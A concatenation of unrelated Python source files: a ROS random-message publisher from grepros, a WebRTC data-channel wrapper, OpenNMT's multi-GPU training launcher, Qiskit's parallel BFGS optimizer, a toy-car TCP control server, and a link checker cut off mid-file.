[--publish-suffix SUFFIX]
[--no-latch]
[--verbose]
[--option KEY=VALUE [KEY=VALUE ...]]
Topic names default to "/generate_msgs/type", like "/generate_msgs/std_msgs/Bool".
Supports both ROS1 and ROS2, version detected from environment.
Stand-alone script, requires ROS1 / ROS2 Python libraries.
ROS1 requires ROS master to be running.
------------------------------------------------------------------------------
This file is part of grepros - grep for ROS bag files and live topics.
Released under the BSD License.
@author Erki Suurjaak
@created 05.02.2022
@modified 09.02.2022
------------------------------------------------------------------------------
"""
import argparse
import collections
import json
import os
import random
import re
import signal
import string
import subprocess
import sys
import threading
import time
import traceback
rospy = rclpy = None
if os.getenv("ROS_VERSION") != "2":
import genpy
import roslib.message
import rospy
else:
import builtin_interfaces.msg
import rclpy
import rclpy.duration
import rclpy.qos
import rclpy.time
import rosidl_runtime_py.utilities
## Configuration for argparse, as {description, epilog, args: [..], groups: {name: [..]}}
ARGUMENTS = {
"description": "Generates random ROS messages, publishes to live topics.",
"arguments": [
dict(args=["TYPES"], nargs="*", metavar="TYPE",
help="ROS message types to use if not all available,\n"
'(supports * wildcards, like "geometry_msgs/*")'),
dict(args=["-v", "--verbose"],
dest="VERBOSE", default=False, action="store_true",
help="print each emitted message"),
dict(args=["--no-type"],
dest="SKIP_TYPES", metavar="TYPE", nargs="+", default=[], action="append",
help="ROS message types to skip (supports * wildcards)"),
dict(args=["-m", "--max-count"],
dest="COUNT", metavar="NUM", default=0, type=int,
help="maximum number of messages to emit"),
dict(args=["--max-topics"],
dest="MAX_TOPICS", metavar="NUM", default=0, type=int,
help="maximum number of topics to emit"),
dict(args=["--max-per-topic"],
dest="MAX_PER_TOPIC", metavar="NUM", default=0, type=int,
help="number of messages to emit in each topic"),
dict(args=["--topics-per-type"],
dest="TOPICS_PER_TYPE", metavar="NUM", default=1, type=int,
help="number of topics to emit per message type (default 1)"),
dict(args=["--interval"],
dest="INTERVAL", metavar="SECONDS", default=0.5, type=float,
help="live publish interval (default 0.5)"),
dict(args=["--publish-prefix"],
dest="PUBLISH_PREFIX", metavar="PREFIX", default="generate_msgs",
help='prefix to prepend to topic name (default "generate_msgs")'),
dict(args=["--publish-suffix"],
dest="PUBLISH_SUFFIX", metavar="SUFFIX", default="",
help='suffix to append to topic name'),
dict(args=["--no-latch"],
dest="LATCH", default=True, action="store_false",
help="do not latch published topics"),
dict(args=["--option"], # Replaced with dictionary after parsing
dest="OPTIONS", metavar="KEY=VALUE", nargs="+", default=[], action="append",
help="options for generated message attributes, as\n"
" arraylen=MIN,MAX range / length of primitive arrays\n"
" or NUM (default 50,100)\n"
" nestedlen=MIN,MAX range / length of nested message lists\n"
" or NUM (default 1,2)\n"
" strlen=MIN,MAX range / length of strings (default 10,50)\n"
" or NUM\n"
" strchars=CHARS characters to use in strings\n"
" (default all printables)\n"
" NUMTYPE=MIN,MAX value range / constant of numeric types\n"
" or CONSTANT like int8\n"),
],
}
## Name used for node
NAME = "generate_msgs"
class rosapi(object):
"""Generic interface for accessing ROS1 / ROS2 API."""
## rclpy.Node instance
NODE = None
## All built-in numeric types in ROS
ROS_NUMERIC_TYPES = ["byte", "char", "int8", "int16", "int32", "int64", "uint8",
"uint16", "uint32", "uint64", "float32", "float64", "bool"]
## All built-in string types in ROS
ROS_STRING_TYPES = ["string", "wstring"]
## All built-in basic types in ROS
ROS_BUILTIN_TYPES = ROS_NUMERIC_TYPES + ROS_STRING_TYPES
## ROS time/duration types mapped to type names
ROS_TIME_CLASSES = {rospy.Time: "time", rospy.Duration: "duration",
genpy.Time: "time", genpy.Duration: "duration"} if rospy else \
{rclpy.time.Time: "builtin_interfaces/Time",
builtin_interfaces.msg.Time: "builtin_interfaces/Time",
rclpy.duration.Duration: "builtin_interfaces/Duration",
builtin_interfaces.msg.Duration: "builtin_interfaces/Duration"}
## Value ranges for ROS integer types, as {typename: (min, max)}
ROS_INTEGER_RANGES = dict({
"byte": (-2** 7, 2** 7 - 1),
"int8": (-2** 7, 2** 7 - 1),
"int16": (-2**15, 2**15 - 1),
"int32": (-2**31, 2**31 - 1),
"int64": (-2**63, 2**63 - 1),
"char": (0, 2** 8 - 1),
"uint8": (0, 2** 8 - 1),
"uint16": (0, 2**16 - 1),
"uint32": (0, 2**31 - 1),
"uint64": (0, 2**64 - 1),
}, **{
"byte": (0, 2** 8 - 1),
"char": (-2** 7, 2** 7 - 1),
} if rclpy else {}) # ROS2 *reverses* byte and char
## ROS2 Data Distribution Service types to ROS built-ins
DDS_TYPES = {"boolean": "bool",
"float": "float32",
"double": "float64",
"octet": "byte",
"short": "int16",
"unsigned short": "uint16",
"long": "int32",
"unsigned long": "uint32",
"long long": "int64",
"unsigned long long": "uint64"}
@classmethod
def get_message_types(cls):
"""Returns a list of available message types, as ["pksg/Msg", ]."""
cmd = "rosmsg list" if rospy else "ros2 interface list --only-msgs"
output = subprocess.check_output(cmd, shell=True).decode()
return sorted(cls.canonical(l.strip()) for l in output.splitlines()
if re.match(r"\w+/\w+", l.strip()))
@classmethod
def init(cls, launch=False):
"""Initializes ROS, creating and spinning node if specified."""
if rospy and launch:
rospy.init_node(NAME)
if rospy and launch:
spinner = threading.Thread(target=rospy.spin)
if rclpy:
rclpy.init()
if rclpy and launch:
cls.NODE = rclpy.create_node(NAME, enable_rosout=False, start_parameter_services=False)
spinner = threading.Thread(target=rclpy.spin, args=(cls.NODE, ))
if launch:
spinner.daemon = True
spinner.start()
@classmethod
def canonical(cls, typename):
"""
Returns "pkg/Type" for "pkg/msg/Type", standardizes various ROS2 formats.
Converts DDS types like "octet" to "byte", and "sequence<uint8, 100>" to "uint8[100]".
"""
is_array, bound, dimension = False, "", ""
match = re.match("sequence<(.+)>", typename)
if match: # "sequence<uint8, 100>" or "sequence<uint8>"
is_array = True
typename = match.group(1)
match = re.match(r"([^,]+)?,\s?(\d+)", typename)
if match: # sequence<uint8, 10>
typename = match.group(1)
if match.lastindex > 1: dimension = match.group(2)
match = re.match("(w?string)<(.+)>", typename)
if match: # string<5>
typename, bound = match.groups()
if "[" in typename: # "string<=5[<=10]" or "string<=5[10]"
dimension = typename[typename.index("[") + 1:typename.index("]")]
typename, is_array = typename[:typename.index("[")], True
if "<=" in typename: # "string<=5"
typename, bound = typename.split("<=")
if typename.count("/") > 1:
typename = "%s/%s" % tuple((x[0], x[-1]) for x in [typename.split("/")])[0]
suffix = ("<=%s" % bound if bound else "") + ("[%s]" % dimension if is_array else "")
return cls.DDS_TYPES.get(typename, typename) + suffix
@classmethod
def create_publisher(cls, topic, typecls, latch=True, queue_size=10):
"""Returns ROS publisher instance."""
if rospy:
return rospy.Publisher(topic, typecls, latch=latch, queue_size=queue_size)
qos = rclpy.qos.QoSProfile(depth=queue_size)
if latch: qos.durability = rclpy.qos.DurabilityPolicy.TRANSIENT_LOCAL
return cls.NODE.create_publisher(typecls, topic, qos)
@classmethod
def get_message_class(cls, typename):
"""Returns ROS message class."""
if rospy:
return roslib.message.get_message_class(typename)
return rosidl_runtime_py.utilities.get_message(cls.make_full_typename(typename))
@classmethod
def get_message_fields(cls, val):
"""Returns OrderedDict({field name: field type name}) if ROS1 message, else {}."""
if rospy:
names = getattr(val, "__slots__", [])
if isinstance(val, (rospy.Time, rospy.Duration)): # Empty __slots__
names = genpy.TVal.__slots__
return collections.OrderedDict(zip(names, getattr(val, "_slot_types", [])))
fields = {k: cls.canonical(v) for k, v in val.get_fields_and_field_types().items()}
return collections.OrderedDict(fields)
@classmethod
def is_ros_message(cls, val):
"""Returns whether value is a ROS message or special like time/duration."""
if rospy:
return isinstance(val, (genpy.Message, genpy.TVal))
return rosidl_runtime_py.utilities.is_message(val)
@classmethod
def is_ros_time(cls, val):
"""Returns whether value is a ROS time/duration."""
return isinstance(val, tuple(cls.ROS_TIME_CLASSES))
@classmethod
def make_full_typename(cls, typename):
"""Returns "pkg/msg/Type" for "pkg/Type"."""
if "/msg/" in typename or "/" not in typename:
return typename
return "%s/msg/%s" % tuple((x[0], x[-1]) for x in [typename.split("/")])[0]
@classmethod
def message_to_yaml(cls, msg):
"""Returns ROS message as YAML string."""
if rospy:
return str(msg)
return rosidl_runtime_py.message_to_yaml(msg)
@classmethod
def scalar(cls, typename, bound=False):
"""
Returns scalar type from ROS message data type, like "uint8" from "uint8[100]".
Returns type unchanged if already a scalar.
@param bound if True, does not strip string boundaries like "string<=10"
"""
if "[" in typename: typename = typename[:typename.index("[")] # int8[?]
if "<=" in typename and not bound:
typename = typename[:typename.index("<=")] # string<=10
return typename
@classmethod
def shutdown(cls):
rclpy and rclpy.shutdown()
class generator(object):
"""Generates random ROS values and message attributes."""
## Attribute generating options
OPTIONS = {
"arraylen": (50, 100), # Length range for primitive arrays like uint8[]
"nestedlen": ( 1, 2), # Length range for nested message lists like Point[]
"strlen": (10, 50), # Length range for strings
"strchars": string.printable.strip() + " ", # Characters used in string
}
@classmethod
def make_random_value(cls, typename, options=None):
"""
Returns random value for ROS builtin type.
@param options {numtype like "int8": fixvalue or (minval, maxval),
"strlen": fixlen or (minlen, maxlen),
"strchars": str} if not using generator defaults
"""
options = dict(cls.OPTIONS, **options or {})
ranges = dict(rosapi.ROS_INTEGER_RANGES, **options or {})
if rosapi.scalar(typename) in rosapi.ROS_STRING_TYPES: # "string<=10" to "string"
LEN = int(re.sub(r"\D", "", typename)) if re.search(r"\d", typename) else \
options["strlen"]
if isinstance(LEN, (list, tuple)): LEN = random.randint(*LEN[:2])
value = "".join(take_sample(options["strchars"], LEN)) if options["strchars"] else ""
elif typename in ("bool", ):
value = random.choice(ranges.get("bool", [True, False]))
elif typename in ("float32", "float64"):
value = random.random()
if typename in ranges:
a, b = (ranges[typename] * 2)[:2]
value = a if a == b else value * (b - a) # Constant or from range
else:
a, b = (ranges[typename] * 2)[:2]
value = a if a == b else random.randint(a, b) # Constant or from range
if rclpy and typename in ("byte", ): # ROS2 *requires* byte value to be bytes()
value = bytes([value])
return value
@classmethod
def populate(cls, msg, options=None):
"""
Returns ROS message with fields populated with random content.
@param options {"arraylen" or "nestedlen" or "strlen": fixlen or (minlen, maxlen),
numtype like "int8": fixvalue or (minval, maxval),
"strchars": str} if not using generator defaults
"""
options = dict(cls.OPTIONS, **options or {})
for name, typename in rosapi.get_message_fields(msg).items():
scalartype = rosapi.scalar(typename)
if typename in rosapi.ROS_BUILTIN_TYPES \
or "[" not in typename and scalartype in rosapi.ROS_BUILTIN_TYPES:
value = cls.make_random_value(typename, options)
elif scalartype in rosapi.ROS_BUILTIN_TYPES: # List of primitives
LEN = options["arraylen"] if typename.endswith("[]") else \
int(re.sub(r"\D", "", typename[typename.index("["):]))
if isinstance(LEN, (list, tuple)): LEN = random.randint(*LEN[:2])
value = [cls.make_random_value(rosapi.scalar(typename, bound=True), options)
for _ in range(LEN)]
elif typename == scalartype: # Single nested message
value = cls.populate(getattr(msg, name), options)
else: # List of nested messages
LEN = options["nestedlen"] if typename.endswith("[]") else \
int(re.sub(r"\D", "", typename[typename.index("["):]))
if isinstance(LEN, (list, tuple)): LEN = random.randint(*LEN[:2])
msgcls = rosapi.get_message_class(scalartype)
value = [cls.populate(msgcls(), options) for _ in range(LEN)]
if rosapi.is_ros_time(msg):
value = abs(value)
setattr(msg, name, value)
return msg
def make_argparser():
"""Returns a populated ArgumentParser instance."""
kws = dict(description=ARGUMENTS["description"], formatter_class=argparse.RawTextHelpFormatter)
argparser = argparse.ArgumentParser(**kws)
for arg in map(dict, ARGUMENTS["arguments"]):
argparser.add_argument(*arg.pop("args"), **arg)
return argparser
def plural(word, items):
"""Returns "N words" or "1 word"."""
count = len(items) if isinstance(items, (dict, list, set, tuple)) else items
return "%s %s%s" % (count, word, "s" if count != 1 else "")
def take_sample(population, k):
"""Returns a list of k randomly chosen elements from population."""
result, n, k = [], k, min(k, len(population))
result = random.sample(population, k)
while len(result) < n:
result += random.sample(population, min(k, n - len(result)))
return result
def wildcard_to_regex(text, end=True):
"""
Returns plain wildcard like "foo*bar" as re.Pattern("foo.*bar", re.I).
@param end whether pattern should match until end (adds $)
"""
suff = "$" if end else ""
return re.compile(".*".join(map(re.escape, text.split("*"))) + suff, re.I)
def process_args(args):
"""
Converts or combines arguments where necessary, returns args.
@param args arguments object like argparse.Namespace
"""
for k, v in vars(args).items(): # Flatten lists of lists and drop duplicates
if not isinstance(v, list): continue # for k, v
here = set()
setattr(args, k, [x for xx in v for x in (xx if isinstance(xx, list) else [xx])
if not (x in here or here.add(x))])
# Split and parse keyword options
opts = dict(generator.OPTIONS, **dict(x.split("=", 1) for x in args.OPTIONS))
for k, v in list(opts.items()):
if not k.endswith("len") and k not in rosapi.ROS_NUMERIC_TYPES \
or not isinstance(v, str):
continue # for k, v
try:
vv = sorted(json.loads("[%s]" % v))
ctor = float if k.startswith("float") else bool if "bool" == k else int
if k.endswith("int64") and sys.version_info < (3, ): ctor = long # Py2
vv = [ctor(x) for x in vv]
if k in rosapi.ROS_INTEGER_RANGES: # Force into allowed range
a, b = rosapi.ROS_INTEGER_RANGES[k]
vv = [max(a, min(b, x)) for x in vv]
opts[k] = vv[0] if len(vv) < 2 and k.endswith("len") else tuple(vv[:2])
except Exception:
sys.exit("Error parsing option %s=%s." % (k, v))
args.OPTIONS = opts
return args
def run(args):
"""Generates messages until Ctrl-C or end condition reached."""
msgtypes = rosapi.get_message_types()
patterns = [wildcard_to_regex(x) for x in args.TYPES]
nopatterns = [wildcard_to_regex(x) for x in args.SKIP_TYPES]
msgtypes = [x for x in msgtypes if not patterns or any(p.match(x) for p in patterns)]
availables = [x for x in msgtypes if not nopatterns or not any(p.match(x) for p in nopatterns)]
if not availables:
print("No message types %s." %
("match" if args.TYPES or args.SKIP_TYPES else "available"))
sys.exit(1)
def choose_topic(typename):
"""Returns new or existing ROS topic name for message type."""
existing = [n for n, t in topiccounts if t == typename]
if len(existing) < args.TOPICS_PER_TYPE:
prefix = "/" + args.PUBLISH_PREFIX.strip("/")
prefix += "/" if len(prefix) > 1 else ""
suffix = "/topic%s" % (len(existing) + 1) if args.TOPICS_PER_TYPE > 1 else ""
suffix += args.PUBLISH_SUFFIX
return "%s%s%s" % (prefix, typename, suffix)
return random.choice(existing)
def choose_type():
"""Returns a random ROS message type name."""
if availables and (not args.MAX_TOPICS
or len(topiccounts) / (args.TOPICS_PER_TYPE or 1) < args.MAX_TOPICS):
return availables.pop(random.randint(0, len(availables) - 1))
candidates = [t for (_, t), c in topiccounts.items() if len(c) < args.MAX_PER_TOPIC] \
if args.MAX_PER_TOPIC else list(typecounts)
return random.choice(candidates) if candidates else None
def is_finished():
"""Returns whether generating is complete."""
done = count >= args.COUNT if args.COUNT else False
if not done and args.MAX_PER_TOPIC:
done = all(len(x) >= args.MAX_PER_TOPIC for x in topiccounts.values())
return done
count = 0 # Total number of messages emitted
pubs = {} # {(topic, typename): ROS publisher instance}
typecounts = collections.Counter() # {typename: messages emitted}
topiccounts = collections.Counter() # {(topic, typename): messages emitted}
print("Message types available: %s." % len(msgtypes))
print("Generating a random message each %s seconds." % args.INTERVAL)
rosapi.init(launch=True)
signal.signal(signal.SIGINT, lambda *_, **__: sys.exit()) # Break ROS1 spin on Ctrl-C
try:
while not is_finished():
typename = choose_type()
if not typename:
break # while
topic = choose_topic(typename)
topickey = (topic, typename)
if topickey not in topiccounts:
print("Adding topic %s." % topic)
try:
cls = rosapi.get_message_class(typename)
msg = generator.populate(cls(), args.OPTIONS)
if topickey not in pubs:
pubs[topickey] = rosapi.create_publisher(topic, cls, latch=args.LATCH)
except Exception as e:
print("Error processing message type %r: %s" % (typename, e))
continue # while
if args.VERBOSE:
print("-- [%s] Message %s in %s" % (count + 1, topiccounts[topickey] + 1, topic))
print(rosapi.message_to_yaml(msg))
pubs[topickey].publish(msg)
count += 1
topiccounts[topickey] += 1
typecounts[typename] += 1
if count and not count % 100:
print("Total count: %s in %s." %
(plural("message", count), plural("topic", topiccounts)))
if args.INTERVAL:
time.sleep(args.INTERVAL)
except (KeyboardInterrupt, SystemExit):
pass
except Exception:
traceback.print_exc()
print("")
print("Emitted %s in %s%s." % (plural("message", count), plural("topic", topiccounts),
(" and %s" % plural("type", typecounts)) if args.TOPICS_PER_TYPE > 1 else ""))
print("")
print("Press Ctrl-C to close publishers and exit.")
try:
while True: time.sleep(10)
except KeyboardInterrupt:
pass
rosapi.shutdown()
sys.exit()
if "__main__" == __name__:
runargs = process_args(make_argparser().parse_args())
run(runargs)
|
datachannel.py
|
from pyrtcdc import ffi, lib
from time import sleep
from threading import Thread
from base64 import b64encode, b64decode
RTCDC_CHANNEL_STATE_CLOSED = 0
RTCDC_CHANNEL_STATE_CONNECTING = 1
RTCDC_CHANNEL_STATE_CONNECTED = 2
RTCDC_DATATYPE_STRING = 0
RTCDC_DATATYPE_BINARY = 1
@ffi.def_extern()
def onopen_cb(channel, userdata):
ffi.from_handle(userdata)._onOpen(channel)
@ffi.def_extern()
def onmessage_cb(channel, datatype, data, length, userdata):
if datatype == RTCDC_DATATYPE_STRING:
message = ffi.cast("char *", data)
message = ffi.string(message)
message = message[:length].decode("UTF-8")
if datatype == RTCDC_DATATYPE_BINARY:
message = ffi.cast("char *", data)
message = ffi.buffer(message, length)[:]
if userdata:
ffi.from_handle(userdata)._onMessage(message)
@ffi.def_extern()
def onclose_cb(channel, userdata):
ffi.from_handle(userdata)._onClose(channel)
@ffi.def_extern()
def onchannel_cb(peer, dc, userdata):
dc.on_message = lib.onmessage_cb
dc.user_data = userdata
ffi.from_handle(userdata)._onChannel(peer, dc)
@ffi.def_extern()
def oncandidate_cb(peer, candidate, userdata):
candidate = ffi.string(candidate)
ffi.from_handle(userdata)._onCandidate(peer, candidate)
@ffi.def_extern()
def onconnect_cb(peer, userdata):
ffi.from_handle(userdata)._onConnect(peer, userdata)
class DataChannel():
def _onOpen(self, channel):
self.dc_open = True
self.onOpen(channel)
def _onMessage(self, message):
self.onMessage(message)
def _onClose(self, channel):
self.dc_open = False
self.onClose(channel)
def _onChannel(self, peer, channel):
self.dc_open = True
self.onChannel(peer, channel)
def _onCandidate(self, peer, candidate):
self.onCandidate(peer, candidate)
def _onConnect(self, peer, userdata):
lib.rtcdc_create_data_channel(peer, self.dcName, self.protocol, lib.onopen_cb, lib.onmessage_cb, lib.onclose_cb, userdata)
self.onConnect(peer)
def onOpen(self, channel):
pass
def onMessage(self, message):
pass
def onClose(self, channel):
pass
def onChannel(self, peer, channel):
pass
def onCandidate(self, peer, candidate):
pass
def onConnect(self, peer):
pass
def __init__(self, dcName="test-dc", stunServer="stun.services.mozilla.com", port=3418, protocol=""):
self._handle = ffi.new_handle(self)
self.dc_open = False
self.dcName = bytes(dcName)
self.protocol = bytes(protocol)
port = int(port)
self.peer = lib.rtcdc_create_peer_connection(lib.onchannel_cb, lib.oncandidate_cb, lib.onconnect_cb, bytes(stunServer), port, self._handle)
Thread(target=lib.rtcdc_loop, args=(self.peer, ),).start()
def generate_offer_sdp(self):
offerSDP = lib.rtcdc_generate_offer_sdp(self.peer)
offerSDP = ffi.string(offerSDP)
return b64encode(offerSDP)
def generate_local_candidate(self):
candidateSDP = lib.rtcdc_generate_local_candidate_sdp(self.peer)
candidateSDP = ffi.string(candidateSDP)
return b64encode(candidateSDP)
def parse_offer_sdp(self, offerSDP):
try:
remoteSDP = b64decode(offerSDP)
except TypeError:
print("Invalid base64!")
parse_offer = lib.rtcdc_parse_offer_sdp(self.peer, remoteSDP)
if parse_offer >= 0:
return self.generate_offer_sdp()
else:
print("Error in parsing offer SDP")
return None
def parse_candidates(self, candidate):
try:
remoteCand = b64decode(candidate)
except TypeError:
print("Invalid base64!")
parse_cand = lib.rtcdc_parse_candidate_sdp(self.peer, remoteCand)
return (parse_cand > 0)
def send_message(self, message):
length_msg = len(message)
if type(message) is str:
datatype = RTCDC_DATATYPE_STRING
message = bytes(message)
elif type(message) is bytes:
datatype = RTCDC_DATATYPE_BINARY
if (self.peer[0].initialized > 0):
if (self.dc_open == True and self.peer[0].channels[0].state > RTCDC_CHANNEL_STATE_CLOSED):
channel = self.peer[0].channels[0]
return (lib.rtcdc_send_message(channel, datatype, message, length_msg) == 0)
else:
return False
else:
return False
def destroy_peer_connection(self, peer):
if (self.peer.initialized > 0 and peer.initialized > 0):
lib.rtcdc_destroy_peer_connection(peer)
return True
return False
def destroy_data_channel(self, channel):
if (self.peer.initialized > 0):
if (self.dc_open == True and channel.state > RTCDC_CHANNEL_STATE_CLOSED):
lib.rtcdc_destroy_data_channel(channel)
return True
return False
|
train_multi.py
|
#!/usr/bin/env python
"""
Multi-GPU training
"""
import argparse
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.logging import logger
from onmt.train_single import main as single_main
def main(opt):
""" Spawns 1 process per GPU """
nb_gpu = len(opt.gpuid)
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
opt.gpu_rank = i
opt.device_id = i
procs.append(mp.Process(target=run, args=(
opt, error_queue, ), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(opt, error_queue):
""" run process """
try:
opt.gpu_rank = onmt.utils.distributed.multi_init(opt)
single_main(opt)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_rank, traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='train.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
opts.add_md_help_argument(parser)
opts.model_opts(parser)
opts.train_opts(parser)
opt = parser.parse_args()
main(opt)
|
p_bfgs.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Parallelized Limited-memory BFGS optimizer"""
import logging
import multiprocessing
import platform
import warnings
from typing import Optional
import numpy as np
from qiskit.utils import algorithm_globals
from qiskit.utils.validation import validate_min
from .scipy_optimizer import SciPyOptimizer
logger = logging.getLogger(__name__)
class P_BFGS(SciPyOptimizer): # pylint: disable=invalid-name
"""
Parallelized Limited-memory BFGS optimizer.
P-BFGS is a parallelized version of :class:`L_BFGS_B` with which it shares the same parameters.
P-BFGS can be useful when the target hardware is a quantum simulator running on a classical
machine. This allows the multiple processes to use simulation to potentially reach a minimum
faster. The parallelization may also help the optimizer avoid getting stuck at local optima.
Uses scipy.optimize.fmin_l_bfgs_b.
For further detail, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
_OPTIONS = ["maxfun", "ftol", "iprint"]
# pylint: disable=unused-argument
def __init__(
self,
maxfun: int = 1000,
ftol: float = 10 * np.finfo(float).eps,
factr: Optional[float] = None,
iprint: int = -1,
max_processes: Optional[int] = None,
options: Optional[dict] = None,
max_evals_grouped: int = 1,
**kwargs,
) -> None:
r"""
Args:
maxfun: Maximum number of function evaluations.
ftol: The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,\|f\^{k+1}\|,1} <= ftol.
factr : (DEPRECATED) The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,
\|f\^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint: Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and \|proj g\| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes: maximum number of processes allowed, has a min. value of 1 if not None.
options: A dictionary of solver options.
max_evals_grouped: Max number of default gradient evaluations performed simultaneously.
kwargs: additional kwargs for scipy.optimize.minimize.
"""
if max_processes:
validate_min("max_processes", max_processes, 1)
if factr is not None:
warnings.warn(
"P_BFGS.__init__() keyword argument factr is deprecated and replaced with ftol. "
"The relationship between the two is ftol = factr * numpy.finfo(float).eps. "
"See https://docs.scipy.org/doc/scipy/reference/optimize.minimize-lbfgsb.html.",
DeprecationWarning,
stacklevel=2,
)
ftol = factr * np.finfo(float).eps
if options is None:
options = {}
for k, v in list(locals().items()):
if k in self._OPTIONS:
options[k] = v
super().__init__(
method="L-BFGS-B",
options=options,
max_evals_grouped=max_evals_grouped,
**kwargs,
)
self._max_processes = max_processes
def optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
num_procs = multiprocessing.cpu_count() - 1
num_procs = (
num_procs if self._max_processes is None else min(num_procs, self._max_processes)
)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == "Darwin":
# Changed in version 3.8: On macOS, the spawn start method is now the
# default. The fork start method should be considered unsafe as it can
# lead to crashes.
# However P_BFGS doesn't support spawn, so we revert to single process.
major, minor, _ = platform.python_version_tuple()
if major > "3" or (major == "3" and minor >= "8"):
num_procs = 0
logger.warning(
"For MacOS, python >= 3.8, using only current process. "
"Multiple core use not supported."
)
elif platform.system() == "Windows":
num_procs = 0
logger.warning(
"For Windows, using only current process. " "Multiple core use not supported."
)
queue = multiprocessing.Queue()
# bounds for additional initial points in case bounds has any None values
threshold = 2 * np.pi
if variable_bounds is None:
variable_bounds = [(-threshold, threshold)] * num_vars
low = [(l if l is not None else -threshold) for (l, u) in variable_bounds]
high = [(u if u is not None else threshold) for (l, u) in variable_bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(
num_vars, objective_function, gradient_function, variable_bounds, _i_pt
)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for _ in range(num_procs):
i_pt = algorithm_globals.random.uniform(low, high) # Another random point in bounds
proc = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(proc)
proc.start()
# While the one optimize in this process below runs the other processes will
# be running too. This one runs
# with the supplied initial point. The process ones have their own random one
sol, opt, nfev = self._optimize(
num_vars, objective_function, gradient_function, variable_bounds, initial_point
)
for proc in processes:
# For each other process we wait now for it to finish and see if it has
# a better result than above
proc.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
return sol, opt, nfev
def _optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
return super().optimize(
num_vars, objective_function, gradient_function, variable_bounds, initial_point
)
|
car_control.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import threading
import time
from server import TcpServer
import key_control
def recv_msg(client_socket):
while True:
recv_content = client_socket.recv(1024)
if recv_content:
# 起停开关 档位杆 左转向舵 右转向舵 加速踏板 减速踏板
# 0 0 1 0 0 0
print("开始小车控制...")
recv_content = recv_content.decode("utf-8")
print("收到的指令是:%s" % recv_content)
key_control.work(recv_content)
else:
# 关闭发动机
break
def send_msg(client_socket):
while True:
# 如果线程数小于等于2,则说明发动机关闭,结束发送速度信息
threading_num = len(threading.enumerate())
if threading_num <= 2:
break
print("发送速度信息...")
time.sleep(1)
class CarCtrlServer(TcpServer):
"""小车控制服务器"""
def __init__(self, server_address):
super().__init__(server_address)
def service(self, client_socket, client_addr):
print("%s小车控制进程启动..." % str(client_addr))
thread_recv = threading.Thread(target=recv_msg, args=(client_socket,))
thread_send = threading.Thread(target=send_msg, args=(client_socket,))
# 接收消息子线程
thread_recv.start()
# 发送消息子线程
thread_send.start()
while True:
threading_num = len(threading.enumerate())
if threading_num <= 1:
print("%s小车控制进程结束" % str(client_addr))
break
# 设定小车控制的IP和端口
SERVER_ADDR = (HOST, PORT) = "192.168.0.10", 10000
def car_ctrl():
"""小车控制程序"""
car_controller = CarCtrlServer(SERVER_ADDR)
car_controller.run_forever()
if __name__ == "__main__":
car_ctrl()
|
links_test.py
|
# -*- coding: utf-8 -*-
import requests
import threading
class Check(object):
def __init__(self, urls, p):
self.urls = set(urls.split('\n'))
self.p = p
self.dic = dict()
self.headers = {'user-agent': 'Mozilla/5.0 (Windows NT 5.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'}
self.lock = threading.Lock()
def check_one(self, url):
try:
html = requests.get(url, headers=self.headers, timeout=4).text
except:
self.lock.acquire()
self.dic[url] = 'bad url'
else:
s = html.find(self.p)
self.lock.acquire()
self.dic[url] = 'true' if s > -1 else 'false'
self.lock.release()
def run(self):
threads = []
for url in self.urls:
if url != '':
